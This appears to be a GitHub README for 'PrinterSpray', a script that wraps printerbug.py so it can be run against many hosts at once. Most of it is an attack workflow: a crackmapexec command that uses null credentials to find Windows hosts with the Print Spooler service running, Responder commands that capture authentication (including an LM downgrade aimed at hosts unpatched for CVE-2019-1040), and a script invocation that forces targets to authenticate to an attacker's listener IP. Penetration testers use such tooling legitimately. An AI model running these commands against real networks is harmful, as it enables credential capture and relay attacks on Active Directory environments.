Skip to content

Latest commit

 

History

History
32 lines (22 loc) · 743 Bytes

README.md

File metadata and controls

32 lines (22 loc) · 743 Bytes

PrinterSpray

Wrapper of https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py to be used with a list of IPs.

Discover potentual targets

crackmapexec smb [subnet] -u '' -p '' -M spooler | grep -a "Spooler service enabled" | awk -F " " '{print$2}' > spooler.txt

Have responder running

sudo responder -I [interface] -Av

Also try with --lm to discover hosts that are not patched to CVE-2019-1040

sudo responder -I [interface] --lm -Av

Run against hosts that have the spooler service enabled

./printerspray.sh -t [targets file] -d [AD domain] -u [username] -p [pwd] -l [listenerIP]

Example:

./printerspray.sh -t ./spooler.txt -d 'labdomain.local' -u 'ADuser1' -p 'pwd' -l 192.168.1.23